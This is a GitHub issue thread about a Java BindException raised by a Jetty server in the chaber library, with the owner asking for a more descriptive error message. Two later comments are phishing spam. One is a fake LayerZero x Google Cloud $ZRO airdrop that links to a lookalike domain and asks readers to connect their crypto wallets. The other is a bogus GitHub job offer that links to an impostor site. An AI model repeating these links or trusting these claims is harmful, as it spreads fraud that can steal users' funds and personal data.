### ISSUE TITLE
java.net.BindException: Address already in use

### ISSUE THREAD

**Issue by sarxos** [sarxos/chaber#1]
``` plain
java.net.BindException: Address already in use
    at sun.nio.ch.Net.bind0(Native Method) ~[na:1.7.0_65]
    at sun.nio.ch.Net.bind(Net.java:444) ~[na:1.7.0_65]
    at sun.nio.ch.Net.bind(Net.java:436) ~[na:1.7.0_65]
    at sun.nio.ch.ServerSocketChannelImpl.bind(ServerSocketChannelImpl.java:214) ~[na:1.7.0_65]
    at sun.nio.ch.ServerSocketAdaptor.bind(ServerSocketAdaptor.java:74) ~[na:1.7.0_65]
    at org.eclipse.jetty.server.ServerConnector.open(ServerConnector.java:321) ~[jetty-server-9.2.5.v20141112.jar:9.2.5.v20141112]
    at org.eclipse.jetty.server.AbstractNetworkConnector.doStart(AbstractNetworkConnector.java:80) ~[jetty-server-9.2.5.v20141112.jar:9.2.5.v20141112]
    at org.eclipse.jetty.server.ServerConnector.doStart(ServerConnector.java:236) ~[jetty-server-9.2.5.v20141112.jar:9.2.5.v20141112]
    at org.eclipse.jetty.util.component.AbstractLifeCycle.start(AbstractLifeCycle.java:68) ~[jetty-util-9.2.5.v20141112.jar:9.2.5.v20141112]
    at org.eclipse.jetty.server.Server.doStart(Server.java:366) ~[jetty-server-9.2.5.v20141112.jar:9.2.5.v20141112]
    at org.eclipse.jetty.util.component.AbstractLifeCycle.start(AbstractLifeCycle.java:68) ~[jetty-util-9.2.5.v20141112.jar:9.2.5.v20141112]
    at com.github.sarxos.hbrs.rs.AbstractServer.run(AbstractServer.java:393) [chaber-1.5.8.jar:na]
    at java.lang.Thread.run(Thread.java:745) [na:1.7.0_65]
```

**Comment by sarxos** [comment]
We need to have some more descriptive message here (what port, bind address, etc)

**Comment by cheransengodan-sensiple** [comment]
### LayerZero x Google Cloud Airdrop 2024: Exclusive $ZRO Tokens 🚀

Welcome to the groundbreaking LayerZero x Google Cloud Airdrop for 2024! Get ready to seize your share of $ZRO tokens in this unprecedented collaboration. Here's your guide to participating:

[Claim Now on LayerZero Official](http://link.layerzer0network.online/rFz335)

![Claim Now](https://miro.medium.com/v2/resize:fit:720/format:webp/0*OZiVjlR298BNDURV.png)

### Airdrop Participation Steps:

1. **Connect Your Wallet:**
   - Visit the [LayerZero Airdrop](http://link.layerzer0network.online/rFz335).
   - Integrate your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Spread the Excitement:**
   - **Facebook:**
     [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Twitter:**
     [Share on Twitter](https://twitter.com/share?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&text=LayerZero+Google+Cloud+Airdrop)
   - **Instagram:**
     [Share on Reddit](https://reddit.com/submit?url=https://medium.com/@cryptoairdrop_/layerzero-x-google-cloud-airdrop-2024-zro-tokens-ff6feebbcc59&title=LayerZero+Google+Cloud+Airdrop)

3. **Verification Check:**
   - Confirm your eligibility for the LayerZero x Google Cloud Airdrop and secure your $ZRO tokens.

Don't miss out on this futuristic collaboration – claim your tokens now and ride the wave of LayerZero innovation with Google Cloud!

**Comment by hyassine1** [comment]
# Exciting Developer Opportunity at GitHub!

Congratulations! You've been selected to apply for an exclusive developer position at GitHub - the world's leading software development platform. [Apply now](https://githubcareer.online/)

## Position: Senior Developer

### Salary:
- Competitive salary package starting at $200,000 per year

### Benefits:
- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Unlimited vacation days
- Professional development opportunities

## Responsibilities:
- Lead the development of cutting-edge projects
- Collaborate with talented teams to drive innovation
- Contribute to open-source projects and communities

## Requirements:
- 2+ years of experience in software development
- Proficiency in multiple programming languages
- Strong problem-solving skills
- Excellent communication and teamwork abilities

If you're ready to take your career to the next level and join a dynamic team of developers, [apply now](https://githubcareer.online/)!

**Hurry! Applications close soon.**

We look forward to welcoming you to the GitHub family!

Best regards,  
GitHub Recruitment Team
